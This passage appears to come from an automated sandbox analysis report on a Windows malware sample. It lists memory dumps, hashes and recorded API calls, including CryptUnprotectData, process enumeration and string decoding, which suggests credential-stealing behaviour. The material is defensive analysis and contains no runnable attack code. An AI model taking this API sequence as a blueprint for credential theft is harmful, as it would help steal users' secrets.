                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 4697f1654ac21c355821ce71e1fda976cb6b260560c9faa892ab8e3f1c920abe
                          • Instruction ID: 0cf91fe7124c431dd4d0543d3b0c550a1f8bb33e3856efa17899229e1b647251
                          • Opcode Fuzzy Hash: 4697f1654ac21c355821ce71e1fda976cb6b260560c9faa892ab8e3f1c920abe
                          • Instruction Fuzzy Hash: 18012575B413197BEB10DB94DC4AFAA7778EB44B11F104156FB09EB2C0D6B1A904C790
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '\$>#a/$@ZB$Ft?]
                          • API String ID: 0-4088510795
                          • Opcode ID: bc60b20e6cd1295e29e6b8bcd95913fd4951bc0093f13266ac34667ae748c143
                          • Instruction ID: 6226d35ce7c587c22126136a75316e9a93dc7ef36c3825742deb913eb03d2568
                          • Opcode Fuzzy Hash: bc60b20e6cd1295e29e6b8bcd95913fd4951bc0093f13266ac34667ae748c143
                          • Instruction Fuzzy Hash: CFB2E8F3A082049FE304AE2DDC85A6AF7E9EFD4720F1A893DE9C4D7744E63558058693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2:fV$W"k$it}f$s{%
                          • API String ID: 0-3960055219
                          • Opcode ID: 38b065e9df4d0d372eff9cd97dabc8e215792f58413ec498cf66cb58e0284ffa
                          • Instruction ID: 234b1315756f04aaba59d6ec3f9cd85bd777bd9e616733e9e70de1d7d5d8988d
                          • Opcode Fuzzy Hash: 38b065e9df4d0d372eff9cd97dabc8e215792f58413ec498cf66cb58e0284ffa
                          • Instruction Fuzzy Hash: C7A206F360C2049FE3046E2DEC8577ABBE5EF94320F1A893DEAC483744EA3559158697
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C3A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C3AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C3ABF
                            • Part of subcall function 003C7310: lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
                            • Part of subcall function 003C7310: lstrcpy.KERNEL32(00000000), ref: 003C733F
                            • Part of subcall function 003C7310: lstrcat.KERNEL32(?,------), ref: 003C7349
                            • Part of subcall function 003C7280: lstrcpy.KERNEL32(00000000), ref: 003C72AE
                          • CloseHandle.KERNEL32(00000000), ref: 003C3BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 86c77c79ea9208db9cdd4ae75bfeaeaf13590a0123fab0e04172315ed7917a76
                          • Instruction ID: 91ca5b798688fa0f7c4229db42f6cd47378c336c8517a99e64e32003419ef269
                          • Opcode Fuzzy Hash: 86c77c79ea9208db9cdd4ae75bfeaeaf13590a0123fab0e04172315ed7917a76
                          • Instruction Fuzzy Hash: 1A811431905214CFC726CF58D888F95B7B1FB44328F2AC1AED4089B2A2D7769D86CF80
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 003AEA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 003AEA7E
                          • lstrcat.KERNEL32(003CCFEC,003CCFEC), ref: 003AEB27
                          • lstrcat.KERNEL32(003CCFEC,003CCFEC), ref: 003AEB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 07ffec56fe4a2f75232fcbd212a5bf951bc5372c86fa995ad1d618627dc638bd
                          • Instruction ID: 2e47d1b003efbfccd61035ebbc03c7be19449a39390cc15ecda1386fbf363f81
                          • Opcode Fuzzy Hash: 07ffec56fe4a2f75232fcbd212a5bf951bc5372c86fa995ad1d618627dc638bd
                          • Instruction Fuzzy Hash: 7131A175A15119ABDB209B58EC49FEEB76DDB84705F0441AAFA09E3240DBB05A088BA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003C40CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003C40DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C40E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003C4113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: d34db7295dfe115aa31d8b407ca75ecc7cca9a8998a02fef77c705858bb542ef
                          • Instruction ID: 5645fefde325a5bc8063bcc266599140b17ff5f22fd132550a8d1cb6623bbbea
                          • Opcode Fuzzy Hash: d34db7295dfe115aa31d8b407ca75ecc7cca9a8998a02fef77c705858bb542ef
                          • Instruction Fuzzy Hash: 5D015A70601205BBDB209FA5EC99FAABBADEF94311F10805ABE08C7240DA719D40DBA0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A9B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A9B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A9B61
                          • LocalFree.KERNEL32 ref: 003A9B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: e75d3e705bf4610df278464fda75e649d93f5db4a82c0c73005cb98f304ce75e
                          • Instruction ID: 5b1f6e8738f0f0e6f5525b0436efcb9cd56af808fddcbdd48734411fa6e8ee32
                          • Opcode Fuzzy Hash: e75d3e705bf4610df278464fda75e649d93f5db4a82c0c73005cb98f304ce75e
                          • Instruction Fuzzy Hash: 6CF01D703423126BE7311F65AC49F567BA8EF15B50F210116FA45EA2D0D7B09844CAA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: r~~$?{W{$O<`H
                          • API String ID: 0-2708903877
                          • Opcode ID: aef69b52be0866f01c0398687f1d592ecf12374df4ce09ca3cadb6e7b011b671
                          • Instruction ID: 736246d3dd0a1346aa8c3365016eac8863fdadf30a8cfd9385538929f549e43e
                          • Opcode Fuzzy Hash: aef69b52be0866f01c0398687f1d592ecf12374df4ce09ca3cadb6e7b011b671
                          • Instruction Fuzzy Hash: A9B249F3A0C2149FE304AE2DEC8567AFBE9EBD4320F1A453DEAC4D3744E57598058692
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: i5${l{$V$m
                          • API String ID: 0-708431156
                          • Opcode ID: a34ba9a2d7060fcba6f50a26d63bd39a687a4aefd8bf99bd91dc6c0362502720
                          • Instruction ID: 46af87431cede8064691f59ad6a31243b7c73cec44690f7f2baf785e27eae443
                          • Opcode Fuzzy Hash: a34ba9a2d7060fcba6f50a26d63bd39a687a4aefd8bf99bd91dc6c0362502720
                          • Instruction Fuzzy Hash: 5292F5F360C2049FE304AE29EC8567ABBE9EF94720F1A493DE6C4C7340E67598158797
                          APIs
                          • CoCreateInstance.COMBASE(003CB110,00000000,00000001,003CB100,?), ref: 003BCB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003BCB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 003BCBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: b95cacfccd0d53f0fd994ac3a476d472b9455083340965115ea6b768de11069f
                          • Instruction ID: 9578145b5b757cac9798893b0339e5326aea13ad8140063b82b24e4ad6a90899
                          • Opcode Fuzzy Hash: b95cacfccd0d53f0fd994ac3a476d472b9455083340965115ea6b768de11069f
                          • Instruction Fuzzy Hash: 66316471A40215BFD711DB94CC92FEEB7B99B88B14F104184FA04EB2D0D7B0AE44CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003A9B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003A9BB3
                          • LocalFree.KERNEL32(?), ref: 003A9BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: f2bd9cd38353a781f0fe512972ddc749723cd2f75aaaa039c311ff7c3e34726c
                          • Instruction ID: c383513fabbac5fec41b1d522fd751935278916a3086d7432542d107fef73302
                          • Opcode Fuzzy Hash: f2bd9cd38353a781f0fe512972ddc749723cd2f75aaaa039c311ff7c3e34726c
                          • Instruction Fuzzy Hash: 6F011275E4130AABD7109BA4DC45FAEB778EB44700F104556EA04AB284DBB09D04C7E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
